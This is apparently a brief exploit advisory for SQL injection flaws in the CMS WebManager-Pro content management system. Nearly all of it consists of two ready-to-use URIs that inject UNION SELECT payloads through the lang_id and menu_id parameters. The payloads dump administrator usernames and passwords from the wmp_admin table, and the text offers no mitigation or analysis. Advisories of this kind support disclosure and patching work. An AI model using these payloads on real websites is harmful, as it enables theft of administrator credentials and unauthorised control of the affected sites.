CMS WebManager-Pro Multiple SQL Injection Vulnerabilities

CMS WebManager-Pro Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
http://www.example.com/index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*